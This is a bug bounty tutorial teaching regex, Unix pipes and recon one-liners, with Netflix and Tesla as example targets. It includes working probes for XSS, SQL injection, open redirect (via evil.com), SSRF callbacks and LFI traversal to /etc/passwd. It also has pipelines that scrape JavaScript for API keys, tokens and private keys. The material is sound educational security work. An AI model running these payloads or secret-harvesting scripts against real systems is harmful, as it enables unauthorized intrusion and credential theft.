THE ART OF FINDING HIDDEN THINGS IN BUG BOUNTY HUNTING (regex, pipes& one liners).

hellow fellors ,its 0xmous27 again. friend-link for free reading this article

0xmous27

~20 min read · May 9, 2026 (Updated: May 9, 2026) · Free: Yes

TL;DR😅: Most bug bounty hunters drown in tool output and miss real findings.This article teaches you how to use regex and Unix pipes to filter signal from noise covering passive recon, XSS, SQLi, open redirects, SSRF, LFI,and secret hunting with real one-liners targeting Netflix and Tesla's public programs.

Introduction

There's a moment every bug bounty hunter knows. You've run subfinder, gau,katana, and waybackurls. Your terminal has scrolled past thousands of lines.You have a folder full of text files. And yet nothing.No bugs. Just noise.

The hunters who consistently find vulnerabilities aren't necessarily running more tools. They're running smarter pipelines. They know how to take the raw, chaotic output of a dozen recon tools and distill it down to the twenty URLs that actually matter. The secret weapon behind that skill isn't a fancy paid tool or a zero-day exploit. It's regex and Unix pipes.

Regex regular expressions is the lens that lets you see patterns in text. Pipes are the glue that connects tools together into automated workflows. Together, they transform your terminal into a vulnerability finding machine. This article is a practical, no-fluff guide to mastering both in the context of bug bounty hunting.

We'll cover everything from a crash course in regex syntax to full recon pipelines, XSS hunting, secret extraction from JavaScript files, and a complete automated recon script. All examples use Netflix (bugcrowd.com/netflix ) and Tesla ( bugcrowd.com/tesla ) as reference targets both are public programs with broad scopes, making them ideal for demonstration.By the end of this article, you'll have a toolkit of one-liners and pipelines you can drop into your workflow immediately.

The Mindset: Think Like a Parser

Before we touch a single command, we need to talk about mindset. Every tool in your bug bounty arsenal subfinder, gau, katana, nuclei, httpx outputs text. That's it. Text to stdout. And text is just data. Data has patterns. Your job as a hunter is to find those patterns and extract meaning from them.

This is the Unix philosophy at its core: build small tools that do one thing well, and compose them together with pipes. grep finds patterns. sed transforms text. awk processes fields. sort and uniq deduplicate. jq parses JSON. None of these tools knows anything about bug bounty hunting but when you chain them together with the right regex, they become a vulnerability scanner.

Think of your recon pipeline as a series of filters. Raw input comes in on the left. Each stage narrows the data down further. By the time you reach the right side of the pipe, you have a small, high-signal list of targets worth investigating manually.

The hunters who miss bugs are the ones who stare at raw tool output and try to manually spot something interesting. The hunters who find bugs are the ones who write a regex that pulls out exactly the URLs with redirect= or file= parameters, and then test only those. Automation handles the boring filtering. You handle the interesting exploitation. Regex is not optional in this workflow. It is the difference between finding a bug and missing it.

Regex Crash Course for Bug Hunters (Practical, Not Academic)

You don't need to memorize every regex feature. You need to know the twenty percent that covers ninety percent of real-world use cases in bug bounty.Here's that twenty percent.

The Basics

• . matches any single character except newline. a.c matches abc , a1c , a-c . • * means zero or more of the preceding element. ab*c matches ac , abc , abbc . • + means one or more. ab+c matches abc , abbc but not ac . • ? means zero or one makes something optional. colou?r matches both color and colour .

In bug bounty, these basics show up constantly. Want to match any API key parameter regardless of spacing? api_key\s*=\s*\S+ uses \s* (zero or more whitespace) to handle both api_key=value and api_key = value .

Character Classes

[abc] matches any single character in the set. [a-z] matches any lowercase letter.

[0–9] matches any digit.

[^abc] matches anything not in the set.

eg: extracting subdomains from crt.sh output where you only want valid hostname characters:

grep -oP '[a-zA-Z0–9._-]+\.netflix\.com'

Anchors

^ anchors to the start of a line. $ anchors to the end. These are critical for avoiding false positives.

Only match lines that START with http grep ^http

Only match lines that END with .js grep \.js$

Shorthand Classes

• \d digit (same as [0–9] ) • \w word character (letters, digits, underscore) • \s whitespace • \D , \W , \S the negations (non-digit, non-word, non-whitespace)

These are PCRE features, so use grep -P or grep -oP to enable them.

Groups and Non-Capturing Groups

(group) captures a match for backreference or extraction. (?:non-capture) groups without capturing useful for applying quantifiers without storing the match.

Capture the value after api_key=
 grep -oP 'api_key=\K[^\s&]+'

Case Insensitive: (?i)

grep -oP '(?i)(api_key|apikey|api-key)\s*[=:]\s*\S+'

This matches API_KEY , api_key , Api-Key all the variations developers use.

\K — The Secret Weapon

\K is a PCRE feature that resets the start of the match. Everything before \K is used as a lookbehind condition but is not included in the output. This is cleaner than a full lookbehind assertion.

#Without \K  you get the prefix too

grep -oP 'token=\S+'
# outputs: token=abc123


# With \K - you get only the value

grep -oP 'token=\K\S+' 
# outputs: abc123

In practice, \K is how you extract clean values from messy text without post-processing.

Lookahead and Lookbehind

• (?=…) — positive lookahead: match if followed by pattern • (?!…) — negative lookahead: match if NOT followed by pattern • (?<=…) — positive lookbehind: match if preceded by pattern • (?<!…) — negative lookbehind: match if NOT preceded by pattern

# Extract URLs that have a 'token' parameter
 grep -oP 'https?://\S+(?=.*token=)'
# Extract the value after 'secret=' but not if it's 'null'
 grep -oP '(?<=secret=)[^&\s]+(?!null)'

Named Groups: (?P<name>…)

Named groups make complex extractions readable and are especially useful with Python or when building custom tooling.

# In Python-style regex (also works in grep -P for display)
 grep -oP '(?P<subdomain>[a-zA-Z0–9-]+)\.tesla\.com'

Practical Extraction Patterns

Here are the regex patterns you'll use most in bug bounty:

# Extract all URLs from a page
 grep -oP 'https?://[^\s"'"'"'<>]+'
# Extract all query parameters
 grep -oP '[?&]\K[^=&]+'
# Extract JWT tokens
 grep -oP 'eyJ[a-zA-Z0–9_-]+\.[a-zA-Z0–9_-]+\.[a-zA-Z0–9_-]+'
# Extract AWS access keys
 grep -oP '(A3T[A-Z0–9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-
 9]{16}'
# Extract email addresses
 grep -oP '[a-zA-Z0–9._%+-]+@[a-zA-Z0–9.-]+\.[a-zA-Z]{2,}'
# Extract IP addresses
 grep -oP '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'## 4. Core Tools & What They Do

grep / grep -oP

The workhorse of text filtering. -o prints only the matching part (not the whole line). -P enables PCRE (Perl-Compatible Regular Expressions), unlocking \K , \d , lookaheads, etc.

Install: pre-installed on most Linux distros
 grep -oP 'https?://[^\s"]+' file.txt

sed

Stream editor. Best for substitution and transformation.

#Remove everything after = (strip parameter values)
sed 's/=.*/=/'
# Remove wildcard prefix from crt.sh output
 sed 's/\*\.//g'

awk

Field-based text processing. Splits lines by delimiter and lets you work with columns.

# Print first and third fields (space-delimited)
 awk '{print $1, $3}'
# Print lines where field 2 equals 443
 awk '$2 == 443'

cut

Simpler field extraction than awk.

# Extract domain from "ip:port" format 

cut -d':' -f1 
#output: ip

sort -u

Sort and deduplicate in one step. Essential before feeding URLs into any tool to avoid redundant requests.

cat urls.txt | sort -u

uniq

Remove consecutive duplicate lines. Use after sort for deduplication, or with -c to count occurrences.

sort urls.txt | uniq -c | sort -rn | head -20

Translate or delete characters. Useful for normalizing input.

# Convert commas to newlines
 echo "a,b,c" | tr ',' '\n'
# Lowercase everything
 cat file.txt | tr '[:upper:]' '[:lower:]'

JSON parser for the command line.Critical for working with API responses.

# Install: apt install jq / brew install jq
 curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value

sample output of the netflix subdomain quered form the open cert

curl

HTTP client. The -s flag silences progress output. -k skips TLS verification. -L follows redirects.

curl -sk -o /dev/null -w '%{http_code}' https://target.com

anew (tomnomnom)

Appends only new lines to a file like tee but deduplicating. Safe to run pipelines multiple times without bloating output files.

# Install
 go install github.com/tomnomnom/anew@latest
subfinder -d netflix.com | anew subs.txt

uro

URL deduplication tool that removes URLs with the same path and parameter structure, keeping only unique patterns.

# Install
 pip3 install uro
cat urls.txt | uro

gf (tomnomnom)

Grep with named pattern files. Lets you run gf xss instead of remembering a long regex.you can make your own gf template simplly through here

# Install
 go install github.com/tomnomnom/gf@latest
 cat urls.txt | gf xss

Gxss and kxss

Pipeline tools for finding reflected XSS candidates. Gxss checks which parameters reflect input; kxss checks which characters are reflected unencoded.

go install github.com/KathanP19/Gxss@latest
go install github.com/tomnomnom/kxss@latest

katana (ProjectDiscovery)

Fast, modern web crawler with JavaScript rendering support.

go install github.com/projectdiscovery/katana/cmd/katana@latest
katana -u https://netflix.com -d 5 -f qurl

waybackurls / gau

Passive URL collection from Wayback Machine and other sources.

go install github.com/tomnomnom/waybackurls@latest
go install github.com/lc/gau/v2/cmd/gau@latest

subfinder / amass

Subdomain enumeration via passive sources.

go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

httpx

Fast HTTP probing — checks which hosts are alive, grabs status codes,titles, and tech stack.

#installation
go install github.com/projectdiscovery/httpx/cmd/httpx@latest

#basic usage
cat subs.txt | httpx -silent -status-code -title

nuclei

Template-based vulnerability scanner. Thousands of community templates for common CVEs and misconfigurations.you can make your nuclei template here without know YAML here

#instalaltion
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

#how to use with list of targets in a file
nuclei -l urls.txt -t ~/nuclei-templates/

ffuf

Fast web fuzzer for directories, parameters, and virtual hosts.

#installation
go install github.com/ffuf/ffuf/v2@latest

#basic usage
 ffuf -u https://netflix.com/FUZZ -w wordlist.txt -mc 200

hakrawler

Simple, fast web crawler focused on link and form extraction.

#installation
go install github.com/hakluke/hakrawler@latest

#basic usage
echo https://netflix.com | hakrawler

Passive Recon One-Liners (with Regex)

Passive recon is where every engagement starts. You're collecting data without touching the target directly using certificate transparency logs,the Wayback Machine, and URL aggregators. The goal is to build a comprehensive picture of the attack surface before you send a single request to the target.

Here's the passive recon toolkit, demonstrated against Netflix and Tesla.

# Subdomain enum via crt.sh (Netflix)
 curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew subs.txt
# Subdomain enum via crt.sh (Tesla)
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[].name_value' | grep -v '^\*' | sort -u
# Wayback URLs
waybackurls netflix.com | uro | anew wayback.txt
# GAU passive URLs — filter for interesting file extensions
 gau — subs netflix.com | uro | grep -E '\.(php|asp|aspx|jsp|json|xml|env|bak|sql|log|conf|config|yaml|yml|ini|txt)$' | anew interesting.txt
# Extract all unique params from wayback (Tesla)
 waybackurls tesla.com | grep '?' | sed 's/=.*/=/' | sort -u | anew params.txt
# Find juicy endpoints by keyword
 gau netflix.com | grep -E '(api|admin|login|auth|token|key|secret|password|upload|file|debug|config|backup|internal)' | sort -u
# Cert transparency with clean hostname extraction (Tesla)
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[].name_value' | grep -oP '[a-zA-Z0–9._-]+\.tesla\.com' | sort -u

Let's break down what's happening in each pipeline. The crt.sh query returns JSON jq -r '.[].name_value' extracts the domain name field from every certificate entry. sed 's/\*\.//g' strips wildcard prefixes like *.api.netflix.com down to api.netflix.com . sort -u deduplicates. anew appends only new entries to the output file.

The GAU pipeline is particularly powerful. By filtering for specific file extensions, you're not just collecting URLs you're immediately triaging them. A .env file in the Wayback Machine is a critical finding. A .bak file might contain source code. .sql files might contain database dumps. This single one-liner can surface critical vulnerabilities before you've touched the target.

The parameter extraction pipeline sed 's/=.*/=/' strips parameter values, leaving you with clean parameter names like ?redirect= and ?file= . This is your input for vulnerability-specific testing later.

Active Recon Pipeline (Full Workflow)

Once passive recon is done, you move to active recon — actually touching the target. This is where you enumerate live hosts, crawl for URLs, and build the full URL corpus you'll use for vulnerability testing.

#Setup
export TARGET="netflix.com"
export OUT="./recon/$TARGET"
mkdir -p $OUT

Step 1: Subdomain enum


 subfinder -d $TARGET -silent | anew $OUT/subs.txt
 curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq -r '.[].name_value' |sed 's/\*\.//g' | sort -u | anew $OUT/subs.txt

Step 2: Probe live hosts


cat $OUT/subs.txt | httpx -silent -status-code -title -tech-detect | anew $OUT/live.txt

Step 3: Crawl


 katana -u "https://$TARGET" -d 5 -f qurl | uro | anew $OUT/urls.txt

Step 4: Passive URLs


 gau --subs $TARGET | uro | anew $OUT/urls.txt
 waybackurls $TARGET | uro | anew $OUT/urls.txt

Step 5: Filter by extension


cat $OUT/urls.txt | grep -E '\.(js|json|xml|env|bak|sql|log|conf|yaml|yml|ini|txt|php|asp|aspx|jsp)$' | anew $OUT/interesting.txt

The httpx step is critical and often skipped by beginners. Subfinder might return 500 subdomains, but only 80 of them are actually live. Running nuclei or katana against all 500 wastes time and generates noise. Probing first with httpx and working only from live.txt is a discipline that separates efficient hunters from slow ones.

The -tech-detect flag on httpx is a bonus it identifies the technology stack (WordPress, React, Django, etc.) which immediately tells you what vulnerability classes to prioritize.

The URL collection step combines three sources: active crawling with katana,and passive collection from GAU and Wayback. Each source finds URLs the others miss. Katana finds URLs that only appear in JavaScript or behind authenticated flows. GAU and Wayback find historical URLs that may have been removed from the live site but still work.

uro is the unsung hero here. Without it, you might have 50,000 URLs that are really just 2,000 unique patterns with different parameter values. uro collapses ?id=1 , ?id=2 , ?id=3 into a single entry, dramatically reducing the work downstream tools need to do.

XSS Hunting Pipeline

Cross-site scripting remains one of the most commonly reported vulnerabilities in bug bounty programs. The challenge isn't finding parameters it's finding parameters that actually reflect input without encoding it. That's where the Gxss and kxss pipeline shines.

Full XSS pipeline

#crawl endpoint url
 katana -u "https://netflix.com" -d 5 -f qurl | uro | anew $OUT/urls.txt

#check for xss pattern
  cat $OUT/urls.txt | Gxss | kxss | grep -oP '^URL: \K\S+' | sed 's/=.*/=/' |sort -u > $OUT/xss_candidates.txt

Manual test with curl


curl -sk "$(cat $OUT/xss_candidates.txt | head -1 )xsstest%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" | grep -oP '(?<=value=")[^"]*xsstest[^"]*'
# Grep reflected params
 cat $OUT/urls.txt | grep '=' | while read url; do
 param=$(echo $url | grep -oP '[?&]\K[^=]+(?==)')
 curl -sk "${url}FUZZ" | grep -q 'FUZZ' && echo "[REFLECTED] $url"
 done

The pipeline works in stages. Gxss injects a canary string into each parameter and checks if it appears in the response. kxss then checks which special characters < , > , " , ' are reflected unencoded these are the characters you need for XSS. The grep -oP '^URL: \K\S+' extracts just the URL from kxss output, and sed 's/=.*/=/' strips the value so you have a clean injection point.

The manual curl test URL-encodes a basic XSS payload and checks if it appears in a value= attribute context one of the most common reflection points.The ?<=value=" lookbehind anchors the match to that specific context.The while read loop at the bottom is a simple but effective reflection checker. For each URL, it extracts the parameter name, appends FUZZ as the value, and checks if FUZZ appears literally in the response. If it does, the parameter reflects input — a prerequisite for XSS.

Open Redirect Hunting

Open redirects are valuable both as standalone findings and as stepping stones to more severe vulnerabilities like OAuth token theft. The key is finding parameters that control where the application redirects after an action.

#Extract redirect params
cat $OUT/urls.txt | gf redirect | sed 's/=.*/=/' | sort -u > $OUT/redirect.txt
# Test with curl following redirects
 cat $OUT/redirect.txt | while read url; doresult=$(curl -sk -o /dev/null -w '%{redirect_url}' "${url}https://evil.com")
 echo $result | grep -q 'evil.com' && echo "[OPEN REDIRECT] $url"
 done
# One-liner version
 cat $OUT/redirect.txt | xargs -I{} curl -sk -o /dev/null -w '%{url_effective} -> %{redirect_url}\n' "{}https://evil.com" | grep 'evil.com'

The gf redirect pattern matches common redirect parameter names: redirect , redirect_uri , return , returnTo , next , url , goto , destination, and many more. The sed 's/=.*/=/' strips existing values so you can inject your own.

The curl -w '%{redirect_url}' flag is the key here it prints the URL that the server redirected to, without following it. If that URL contains evil.com , you have an open redirect. The -o /dev/null discards the response body since you only care about the redirect header.

The xargs -I{} one-liner version is faster for large lists because it doesn't spawn a subshell for each URL. The %{url_effective} shows the final URL after all redirects, while %{redirect_url} shows the first redirect target both are useful for different redirect scenarios.

SQLi Hunting

SQL injection is rarer in modern applications but still appears regularly in bug bounty programs, especially in legacy endpoints, admin panels, and API parameters. The approach here is error-based detection — injecting a single quote and looking for database error messages in the response.

# Extract SQLi candidates
 cat $OUT/urls.txt | gf sqli | sed 's/=.*/=/' | sort -u > $OUT/sqli.txt
# Quick error-based test
 cat $OUT/sqli.txt | while read url; do
 curl -sk "${url}'" | grep -iE "(sql syntax|mysql_fetch|ORA-|pg::|sqlite_error|ODBC SQL)" && echo "[SQLI] $url"
 done
# With nuclei
 nuclei -l $OUT/sqli.txt -t ~/nuclei-templates/vulnerabilities/generic/sqli-error-based.yaml -o $OUT/sqli_findings.txt

The regex in the grep step covers error messages from the four most common database engines: MySQL sql syntax , mysql_fetch , Oracle ORA- ,PostgreSQL pg:: , and SQLite sqlite_error . The ?i case-insensitive flag or -i in grep handles variations in how different frameworks format error messages.

The nuclei approach is complementary it uses curated templates that test more injection patterns and error signatures than a simple quote injection. Running both gives you better coverage.

One important note: always URL-encode your payloads when injecting through curl. A raw single quote in a URL can cause curl to misparse the argument.Use %27 instead of ' when in doubt.

Secret / API Key Hunting in JavaScript

JavaScript files are goldmines. Developers frequently hardcode API keys, tokens, and credentials in frontend JavaScript — sometimes intentionally (for client-side SDKs), sometimes accidentally (committing debug code). Either way, it's your job to find them.

# Extract all JS files
 cat $OUT/urls.txt | grep '\.js$' | sort -u > $OUT/jsfiles.txt
# Download and grep for secrets
 cat $OUT/jsfiles.txt | while read url; do
 curl -sk "$url" | grep -oP '(api[_-]?key|apikey|api[_-]?secret|access[_-]?token|secret[_-]?key)\s*[=:]\s*["\x27][a-zA-Z0–9_\-]{20,}["\x27]'
 done | sort -u > $OUT/secrets.txt
# AWS keys
 cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP '(A3T[A-Z0–9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0–9]{16}'
# GitHub tokens
 cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP 'ghp_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0–9_]{82}'
# Private keys
 cat $OUT/jsfiles.txt | xargs -I{} curl -sk {} | grep -oP ' — — -BEGIN [A-Z]*PRIVATE KEY — — -'

The general secrets regex uses ?i case-insensitivity and matches common naming patterns: api_key , apiKey , api-key , api_secret , access_token , secret_key . The {20,} quantifier requires at least 20 characters this filters out placeholder values like YOUR_API_KEY_HERE while catching real secrets.

The AWS key regex is precise and based on the actual format Amazon uses.AWS access key IDs always start with one of those specific prefixes (AKIA for long-term keys, ASIA for temporary session keys, etc.) followed by exactly16 uppercase alphanumeric characters. This pattern has an extremely low false positive rate.

The xargs -I{} approach is faster than a while read loop for simple cases because it avoids subshell overhead. The -P5 flag (parallel execution with 5 workers) can speed this up further for large JS file lists:

cat $OUT/jsfiles.txt | xargs -P5 -I{} curl -sk {} | grep -oP 'AKIA[A-Z0-9]{16}'

SSRF Hunting

Server-Side Request Forgery lets you make the target server send requests on your behalf potentially reaching internal services, cloud metadata endpoints, or other restricted resources. Finding SSRF requires identifying parameters that accept URLs or hostnames.

# Extract SSRF-prone params
 cat $OUT/urls.txt | gf ssrf | sed 's/=.*/=/' | sort -u > $OUT/ssrf.txt
# Test with interactsh (replace with your interactsh URL)
 INTERACT="your-id.oast.fun"
 cat $OUT/ssrf.txt | while read url; do
 curl -sk "${url}https://$INTERACT" &
 done
 # Then check interactsh for callbacks

The gf ssrf pattern matches parameters like url , uri , path , dest , destination , redirect , proxy , fetch , load , src , source , href , link , callback , host , endpoint , and similar names that suggest the server might fetch a URL.you can simply set your custome pattern simply here and download your template.

The interactsh approach is the gold standard for SSRF detection. Instead of pointing at evil.com which you don't control, you use an interactsh server that logs every incoming request. If the target server fetches your URL, you'll see the callback in the interactsh dashboard — even if the response to your original request gives no indication that a fetch occurred.

The & at the end of the curl command runs it in the background, allowing you to test many URLs in parallel. Just make sure to wait at the end of the loop if you need to ensure all requests complete before checking interactsh.

LFI Hunting

Local File Inclusion vulnerabilities allow reading arbitrary files from the server's filesystem. They're most common in PHP applications but appear in other stacks too. The classic test is path traversal to /etc/passwd .

# Extract file/path params
 cat $OUT/urls.txt | gf lfi | sed 's/=.*/=/' | sort -u > $OUT/lfi.txt
# Test traversal
 cat $OUT/lfi.txt | while read url; do
 curl -sk "${url}../../../etc/passwd" | grep -q 'root:' && echo "[LFI]$url"
 done

The gf lfi pattern matches parameters like file , path , page , include , template , view , doc , document , folder , root , pg , style , and similar names that suggest file path handling.

The grep -q 'root:' check looks for the characteristic first line of /etc/passwd — root:x:0:0:root:/root:/bin/bash . If that string appears in the response, you have confirmed LFI. The -q flag makes grep silent (no output) and just sets the exit code, which the && operator uses to conditionally print the finding.

For deeper testing, consider also trying Windows paths ..\..\windows\win.ini and null byte injection ../../../etc/passwd%00 for older PHP versions.

Advanced jq + curl Tricks

JSON is everywhere in modern web applications API responses, configuration endpoints, certificate transparency logs, search APIs. jq is your scalpel for extracting exactly what you need from JSON data.

# Parse Shodan for a target
 shodan search 'hostname:netflix.com' — fields ip_str,port,org | awk '{print $1":"$2}' | anew $OUT/shodan.txt
# crt.sh with full JSON parsing — name, issuer, and issue date
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" |jq -r '.[] | [.name_value, .issuer_name, .not_before] | @tsv' | grep -v '^\*' | sort -u
# Extract emails from crt.sh (sometimes appears in cert subject)
 curl -s "https://crt.sh/?q=%.netflix.com&output=json" | jq -r '.[].name_value' | grep -oP '[a-zA-Z0–9._%+-]+@[a-zA-Z0–9.-]+\.[a-zA-Z]{2,}' | sort -u
# GitHub dorks via API (public)
 curl -s -H "Accept: application/vnd.github.v3+json" "https://api.github.com/search/code?q=netflix.com+api_key&per_page=10" | jq -r '.items[].html_url'
# Wayback CDX API (raw, high volume)
 curl -s "http://web.archive.org/cdx/search/cdx?url=*.netflix.com/*&output=json&fl=original&collapse=urlkey&limit=10000" | jq -r '.[] | .[0]' | grep -v 'original' | uro | anew $OUT/wayback_cdx.txt

The @tsv filter in jq formats an array as tab-separated values perfect for piping into awk or cut for further processing. The [.name_value, .issuer_name, .not_before]constructs an array from three fields before formatting.

The Wayback CDX API is more powerful than waybackurls for large targets.It supports filtering by MIME type, status code, and date range. The collapse=urlkey parameter deduplicates by URL structure (similar to uro), and limit=10000 caps the results. For very large targets like Netflix, you may want to paginate or filter by subdomain.

The GitHub code search API is a passive recon goldmine. Developers push code containing hardcoded credentials, internal hostnames, and API endpoints to public repositories. The API is rate-limited for unauthenticated requests,so use a token if you're doing this regularly.

One powerful jq pattern worth memorizing is select() for filtering:

# Only show crt.sh entries issued in the last year
 curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[] | select(.not_before > "2025–01–01") | .name_value' | sort -u

The gf Pattern Library

gf (grep-friendly) is one of the most underrated tools in the bug bounty ecosystem. Created by tomnomnom, it's essentially a wrapper around grep that lets you save and reuse named regex patterns. Instead of remembering a 200 character regex for XSS parameters, you just run gf xss .

Full Automated Recon Script

Everything we've covered so far comes together in this script. Save it as recon.sh , make it executable, and run it against any target in scope.

#!/bin/bash
# recon.sh - Full Bug Bounty Recon Pipeline
# Usage: ./recon.sh netflix.com
TARGET=$1
OUT="./recon/$TARGET"
mkdir -p $OUT/{subs,urls,vulns,secrets,js}
echo "[*] Starting recon on $TARGET"
# Passive subs
echo "[*] Subdomain enum…"
subfinder -d $TARGET -silent | anew $OUT/subs/subs.txt
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew $OUT/subs/subs.txt
# Probe
echo "[*] Probing live hosts…"
cat $OUT/subs/subs.txt | httpx -silent | anew $OUT/subs/live.txt
# URLs
echo "[*] Collecting URLs…"
gau - subs $TARGET | uro | anew $OUT/urls/all.txt
waybackurls $TARGET | uro | anew $OUT/urls/all.txt
katana -list $OUT/subs/live.txt -d 3 -f qurl -silent | uro | anew $OUT/urls/all.txt
# Filter
cat $OUT/urls/all.txt | grep -E '\.(js)$' | anew $OUT/js/files.txt
cat $OUT/urls/all.txt | gf xss | sed 's/=.*/=/' | sort -u > $OUT/vulns/xss.txt
cat $OUT/urls/all.txt | gf sqli | sed 's/=.*/=/' | sort -u > $OUT/vulns/sqli.txt
cat $OUT/urls/all.txt | gf redirect | sed 's/=.*/=/' | sort -u > $OUT/vulns/redirect.txt
cat $OUT/urls/all.txt | gf ssrf | sed 's/=.*/=/' | sort -u >$OUT/vulns/ssrf.txt
cat $OUT/urls/all.txt | gf lfi | sed 's/=.*/=/' | sort -u > $OUT/vulns/lfi.txt
# Secrets in JS
echo "[*] Hunting secrets in JS…"
cat $OUT/js/files.txt | xargs -P5 -I{} curl -sk {} | grep -oP '(api[_-]key|apikey|secret|token|password)\s*[=:]\s*["\x27][a-zA-Z0–9_\-]{16,}["\x27]' | sort -u > $OUT/secrets/js_secrets.txt
# Summary
echo ""
echo "===== RECON SUMMARY ====="
echo "Subdomains: $(wc -l < $OUT/subs/subs.txt)"
echo "Live hosts: $(wc -l < $OUT/subs/live.txt)"
echo "Total URLs: $(wc -l < $OUT/urls/all.txt)"
echo "JS files: $(wc -l < $OUT/js/files.txt)"
echo "XSS candidates: $(wc -l < $OUT/vulns/xss.txt)"
echo "SQLi candidates: $(wc -l < $OUT/vulns/sqli.txt)"
echo "Redirect candidates: $(wc -l < $OUT/vulns/redirect.txt)"
echo "Secrets found: $(wc -l < $OUT/secrets/js_secrets.txt)"
echo "========================="

This script is intentionally modular. Each section is independent if subfinder is slow, you can comment it out and run only crt.sh. If you're revisiting a target, the anew calls mean re running the script only adds new findings rather than duplicating existing ones.

The -P5 flag on xargs runs five curl requests in parallel for JS file downloading. Adjust this based on your connection speed and the target's rate limiting. For large programs like Netflix with thousands of JS files, parallel downloading can cut this step from hours to minutes.

Pro Tips & Secrets

These are the techniques that separate hunters who find bugs from hunters who find noise.\K resets the match start.Instead of

grep -oP '(?<=token=)\S+' (which requires a fixed-width lookbehind), use grep -oP 'token=\K\S+' . It's cleaner, more readable, and works with variable-length prefixes.

anew is idempotent. Unlike >> which blindly appends, anew only adds lines that aren't already in the file. This means you can re-run your entire pipeline against a target you've already scanned, and you'll only see new findings. Build this habit from day one.

uro before everything. Before feeding URLs into any tool that makes HTTP requests, run them through uro . Reducing 50,000 URLs to 5,000 unique patterns saves time, reduces noise, and avoids hitting rate limits.

httpx -mc 200 for precision. When you only care about live, accessible endpoints, filter with -mc 200 (match status code 200). This eliminates redirects, 403s, and 404s from your working set.

sort -u is free deduplication. Always sort and deduplicate before feeding data into tools. It costs almost nothing and prevents redundant work downstream.

tee for simultaneous write and pipe. When you want to save output AND pipe it to the next command:

subfinder -d netflix.com | tee subs.txt | httpx -silent

This writes to subs.txt while simultaneously piping to httpx no need to run subfinder twice.

xargs -P10 for parallelism. Most recon tasks are I/O bound, not CPU bound.Running 10 parallel curl requests is almost always faster than running them sequentially. Adjust the number based on the target's rate limiting.

2>/dev/null to silence errors. In long pipelines, tool errors printed to stderr can clutter your output. Redirect stderr to /dev/null for cleaner results:

cat urls.txt | while read url; do curl -sk "$url" 2>/dev/null | grep 'secret'; done

while read for complex per-URL logic. When you need to do multiple operations per URL (extract a parameter, make a request, check the response), a while read loop is cleaner than chaining pipes:

cat urls.txt | while read url; do
 # Multiple operations on $url
 done

grep -v to exclude noise. CDN URLs, analytics scripts, and tracking pixels pollute your URL lists. Filter them out early:

cat urls.txt | grep -vE '(google-analytics|doubleclick|facebook|twitter|cdn\.cloudflare|jquery\.min\.js)'

Scope your regex to the target. When extracting subdomains, always anchor to the target domain to avoid false positives from unrelated certificates:

grep -oP '[a-zA-Z0–9._-]+\.netflix\.com'

Chain nuclei after gf. The gf patterns give you candidate URLs; nuclei gives you confirmed findings. The combination is powerful:

cat urls.txt | gf sqli | nuclei -t ~/nuclei-templates/vulnerabilities/ -silent

Conclusion

Regex is not optional in modern bug bounty hunting. It is the difference between staring at 50,000 lines of tool output and having a focused list of 20 URLs worth testing manually. Every hour you invest in learning regex pays dividends across every engagement you'll ever run.

The pipelines in this article are starting points, not endpoints. The best hunters customize their gf patterns for the specific technologies they encounter. They build target-specific wordlists from the URL patterns they ind. They write scripts that automate the boring parts so they can spend their time on the interesting parts the manual analysis, the creative chaining of vulnerabilities, the business logic flaws that no automated tool will ever find.Build your pipeline. Customize your patterns. Automate the noise. Focus on the signal.

Happy hunting. Stay in scope.

#reconnaissance #regex #infosec #web-security #penetration-testing

< Go to the original